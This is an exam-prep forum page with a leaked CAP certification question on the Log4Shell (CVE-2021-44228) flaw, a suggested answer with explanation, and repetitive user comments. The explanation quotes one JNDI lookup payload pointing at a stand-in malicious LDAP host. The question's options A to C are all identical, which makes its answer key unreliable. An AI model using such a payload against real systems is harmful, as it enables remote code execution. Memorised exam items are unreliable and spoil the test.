New Year Sale 2026! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions

The SecOps Group CAP Exam - Topic 12 Question 95 Discussion

Actual exam question for The SecOps Group's CAP exam
Question #: 95
Topic #: 12
[All CAP Questions]

In the context of the infamous log4j vulnerability (CVE-2021-44228), which vulnerability is exploited in the backend to achieve Remote Code Execution?

Show Suggested Answer Hide Answer
Suggested Answer: B

The Log4j vulnerability, identified as CVE-2021-44228 (commonly known as Log4Shell), is a critical security flaw in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability allows remote code execution (RCE) when an attacker crafts a malicious input (e.g., ${jndi:ldap://malicious.com/a}) that is logged by a vulnerable Log4j instance. The exploit leverages JNDI (Java Naming and Directory Interface) Injection, where the JNDI lookup mechanism is abused to load remote code from an attacker-controlled server. All options (A, B, and C) list 'JNDI Injection,' which is correct, but since B is marked as the selected answer in the image, it is taken as the intended choice. This redundancy in options suggests a possible error in the question design, but the vulnerability is unequivocally JNDI Injection. Option D ('None of the above') is incorrect as JNDI Injection is the exploited vulnerability. This topic is critical in the CAP syllabus under injection attacks and RCE prevention.


Contribute your Thoughts:

0/2000 characters
Edwin
2 months ago
I thought there were other vulnerabilities involved too?
upvoted 0 times
...
Beckie
2 months ago
Wait, are we sure it's not something else?
upvoted 0 times
...
Ernest
2 months ago
It's definitely JNDI Injection!
upvoted 0 times
...
Cristy
3 months ago
Totally agree, that's the main exploit here.
upvoted 0 times
...
Lea
3 months ago
JNDI Injection all the way! No doubt about it.
upvoted 0 times
...
Joni
3 months ago
I thought there was something about JNDI Injection being exploited, but I can't remember if it was all the same or if there were different types.
upvoted 0 times
...
Colby
3 months ago
I'm a bit unsure, but I remember JNDI being a key part of the log4j vulnerability. Maybe it's option A?
upvoted 0 times
...
Gregoria
4 months ago
I recall practicing a question about JNDI Injection in relation to log4j, so I feel like it has to be one of those answers.
upvoted 0 times
...
Marti
4 months ago
I think the answer is JNDI Injection, but I can't remember if it's specifically one of the options listed.
upvoted 0 times
...
Joye
4 months ago
The answer is definitely JNDI Injection. I studied this vulnerability extensively, so I'm confident that's the right choice.
upvoted 0 times
...
Rory
4 months ago
I'm a little confused by this question. I'll need to think it through carefully and make sure I understand the details before answering.
upvoted 0 times
...
Noah
4 months ago
JNDI Injection sounds right to me. That's the key vulnerability that allowed the remote code execution, if I remember correctly.
upvoted 0 times
...
Xochitl
5 months ago
Hmm, I'm a bit unsure about this one. I'll need to review the details of the log4j vulnerability again to be confident in my answer.
upvoted 0 times
...
Rosita
5 months ago
I'm pretty sure the answer is JNDI Injection, since that's the vulnerability that was exploited in the log4j incident.
upvoted 0 times
...
Michael
7 months ago
D) None of the above - just kidding, it's clearly JNDI Injection. I'd have to be log4j-less to get this one wrong.
upvoted 0 times
...
Ronald
7 months ago
JNDI Injection, JNDI Injection, JNDI Injection... talk about a one-trick pony of an exam question!
upvoted 0 times
...
Ahmed
7 months ago
Hmm, all the options say JNDI Injection. I guess the exam writers really want to drive that point home!
upvoted 0 times
Kami
5 months ago
Hmm, all the options say JNDI Injection. I guess the exam writers really want to drive that point home!
upvoted 0 times
...
Jennifer
6 months ago
C) JNDI Injection
upvoted 0 times
...
Marguerita
6 months ago
B) JNDI Injection
upvoted 0 times
...
Carmela
7 months ago
A) JNDI Injection
upvoted 0 times
...
...
Sanda
8 months ago
I'm not sure, but I think it's A) JNDI Injection as well. It makes sense given the nature of the log4j vulnerability.
upvoted 0 times
...
Bettyann
8 months ago
B) JNDI Injection - I learned about this in my security training. Definitely the correct answer.
upvoted 0 times
Lonny
6 months ago
D) None of the above - Actually, it is JNDI Injection that is exploited for Remote Code Execution.
upvoted 0 times
...
Wava
7 months ago
B) JNDI Injection - Yes, that's the one! It's crucial to be aware of these vulnerabilities.
upvoted 0 times
...
Amie
7 months ago
A) JNDI Injection - That's correct! It's the vulnerability exploited in the backend for Remote Code Execution.
upvoted 0 times
...
...
Marva
8 months ago
I agree with Louvenia, JNDI Injection is the vulnerability exploited for Remote Code Execution.
upvoted 0 times
...
Merissa
8 months ago
JNDI Injection for sure! That's the key vulnerability that allows the log4j exploit to work.
upvoted 0 times
Reta
7 months ago
Definitely JNDI Injection, that's what enables the exploit to achieve Remote Code Execution.
upvoted 0 times
...
Fausto
7 months ago
Yes, JNDI Injection is the key vulnerability that allows the log4j exploit to work.
upvoted 0 times
...
Ming
7 months ago
JNDI Injection is definitely the vulnerability exploited for Remote Code Execution.
upvoted 0 times
...
...
Louvenia
8 months ago
I think the answer is A) JNDI Injection.
upvoted 0 times
...

Save Cancel